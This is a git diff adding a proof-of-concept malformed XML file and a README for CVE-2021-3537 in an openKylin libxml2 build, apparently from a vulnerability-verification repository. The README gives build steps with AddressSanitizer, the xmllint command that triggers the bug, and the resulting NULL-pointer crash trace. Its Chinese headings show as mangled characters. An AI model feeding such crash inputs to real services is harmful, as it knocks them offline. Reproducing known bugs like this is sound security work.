diff --git a/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc
new file mode 100644
index 0000000000000000000000000000000000000000..83fe4f1b70b8550c37c50d3820965dc2b7b4ce31
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc
@@ -0,0 +1,23 @@
+<:>
+
+
+
+
+
+<÷ßóELEMEÿÿ<:>
+
+
+
+
+
+<]@?
\ No newline at end of file
diff --git a/cve/libxml2/2021/CVE-2021-3537/README.md b/cve/libxml2/2021/CVE-2021-3537/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..56b1d0999fab7d8732416f7e42e4d1400aefc78f
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3537/README.md
@@ -0,0 +1,118 @@
+## æ¼æ´žéªŒè¯
+### 下载æºç 
+https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1)
+
+### 编译
+```bash
+$ cd libxml2
+#下载编译ä¾èµ–
+$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev
+#å¼€å¯-ggdb -fsanitize=address
+$ CFLAGS="-ggdb -fsanitize=address" ./configure
+#编译
+$ make
+```
+
+### æ¼æ´žå¤çް
+```bash
+$ ./xmllint --recover --postvalid ../CVE/CVE-2021-3537-poc
+../CVE/CVE-2021-3537-poc:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name !
+'
+:(<:>
+ ^
+../CVE/CVE-2021-3537-poc:5: parser error : ContentDecl : Name or '(' expected
+:(.,()+><:>
+ ^
+../CVE/CVE-2021-3537-poc:5: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration
+
+:(.,()+><:>
+ ^
+../CVE/CVE-2021-3537-poc:5: parser error : DOCTYPE improperly terminated
+:(.,()+><:>
+ ^
+../CVE/CVE-2021-3537-poc:5: namespace error : Failed to parse QName ':'
+:(.,()+><:>
+ ^
+../CVE/CVE-2021-3537-poc:11: parser error : Couldn't find end of Start Tag YPE line 11
+<:>
+ ^
+../CVE/CVE-2021-3537-poc:23: parser error : StartTag: invalid element name
+<]@?
+ ^
+../CVE/CVE-2021-3537-poc:23: parser error : EndTag: '<]@?
+ ^
+output error : string is not in UTF-8
+
+
+]>
+<:>
+
+
+
+
+
+<:>
+
+
+
+
+
+]@?
+AddressSanitizer:DEADLYSIGNAL
+=================================================================
+==18011==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f16b52bdd80 bp 0x7ffe22b96a50 sp 0x7ffe22b96920 T0)
+==18011==The signal is caused by a READ memory access.
+==18011==Hint: address points to the zero page.
+ #0 0x7f16b52bdd7f in xmlValidBuildAContentModel /data1/libxml2-openkylin-yangtze/valid.c:729
+ #1 0x7f16b52bebc7 in xmlValidBuildContentModel__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:839
+ #2 0x7f16b52d0c69 in xmlValidateElementContent /data1/libxml2-openkylin-yangtze/valid.c:5330
+ #3 0x7f16b52d4ab6 in xmlValidateOneElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6234
+ #4 0x7f16b52d61c3 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6479
+ #5 0x7f16b52d8893 in xmlValidateDocument__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6942
+ #6 0x564d2e3c2703 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2799
+ #7 0x564d2e3c8cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #8 0x7f16b4f7c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+ #9 0x564d2e3b8aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /data1/libxml2-openkylin-yangtze/valid.c:729 in xmlValidBuildAContentModel
+==18011==ABORTING
+```
\ No newline at end of file